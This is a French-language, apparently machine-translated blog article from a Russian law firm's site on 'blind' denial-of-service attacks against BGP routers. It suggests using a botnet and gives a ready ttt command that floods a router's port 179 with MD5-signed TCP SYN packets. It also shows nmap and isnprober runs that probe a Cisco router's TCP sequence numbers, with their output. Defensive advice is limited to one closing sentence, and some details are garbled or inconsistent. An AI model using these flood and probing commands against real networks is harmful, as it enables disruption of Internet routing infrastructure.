Москва
+7-929-527-81-33
Вологда
+7-921-234-45-78
Вопрос юристу онлайн Юридическая компания ЛЕГАС Вконтакте

Attaques DoS « aveugles » sur les routeurs BGP. 1

Обновлено 29.09.2025 12:17

Aveugles, nous appellerons les attaques qui ne nécessitent aucune connaissance supplémentaire autre que l'adresse IP du routeur BGP. Le scénario le plus simple d'une telle attaque DoS est SYN flood sur le port TCP 179. Pour mettre en œuvre une telle attaque sur un routeur industriel, vous devez utiliser plusieurs dizaines d'ordinateurs, et mieux un bot-réseau.

Une façon plus intéressante d'« inonder » un routeur BGP cible utilisant l'authentification MD5 consiste à appliquer des paquets TCP SYN avec des signatures MD5. Cette attaque permet d'ajouter une charge de calcul au traitement MD5 par le routeur attaqué.

Une telle attaque est facile à réaliser avec l'utilitaire TTT avec l'option md5. Pour optimiser l'inondation, plusieurs instances de ttt doivent être exécutées sur plusieurs dizaines de machines.

Voici un exemple d'utilisation de l'utilitaire ttt:

arhontus# ./ttt --flood 10000000 -y 11006 --syn --md5

allyourbgparebelongtous -D 192.168.66.191 && ./ttt --flood 10000000 -y

179 --syn --md5 allyourbgparebelongtous -D 192.168.66.191

En ce qui concerne le matériel fabriqué par Cisco Systems, il convient de mentionner la possibilité d'implémenter des attaques de débordement de pile TCP/IP IOS. Pour identifier ces vulnérabilités, vous pouvez utiliser des scanneurs de vulnérabilité tels que Nmap, hping2 et isnprober.

Voici un exemple pour le routeur Cisco 2600:

kali# nmap -sS -O -vvvv 192.168.66.215

<skip>

TCP Sequence Prediction: class="truly" random

Difficulty=9999999 (Good luck!)

TCP ISN Seq. Numbers: 5142798B A95D7AC9 71F42B5A 4D684349 FF2B94D4 B764FD5C

<skip> arhontus# # perl isnprober.pl -n 10 -i eth0 -p 23 192.168.66.215

-- ISNprober / 1.02 / Tom Vandepoel (Tom.Vandepoel@ubizen.com) --

Using eth0:192.168.77.5

Probing host: 192.168.66.215 on TCP port 23.

Host:port ISN Delta

192.168.66.202:23 -1154503313

192.168.66.202:23 -24125463 1130377850

192.168.66.202:23 2031059534 2055184997

192.168.66.202:23 965205234 -1065854300

192.168.66.202:23 -1974685094 -2939890328

192.168.66.202:23 1760147902 3734832996

192.168.66.202:23 2089287258 329139356

192.168.66.202:23 -923724721 -3013011979

192.168.66.202:23 -934490140 -10765419

192.168.66.202:23 -1262713275 -328223135

En général, le protocole de routage BGP version 4 fait partie intégrante de l'Internet moderne et, par conséquent, les problèmes de fonctionnement de ce protocole auront certainement une incidence sur le fonctionnement du réseau étendu. Par conséquent, si l'administrateur système est responsable de la maintenance des routeurs BGP (généralement des fournisseurs), il est nécessaire de prendre au sérieux les menaces potentielles et de prendre des mesures de protection à l'avance.

Petukhov Oleg, avocat en droit international et protection des renseignements personnels, spécialiste de l'information sécurité, protection de l'information et des données personnelles.

Canal Telegram: https://t.me/protecciondelainformacion

Groupe au Télégramme: https://t.me/securiteinformatique2

Site: https://legascom.ru

Courriel: online@legascom.ru

#sécuritéinformations #informationsécurité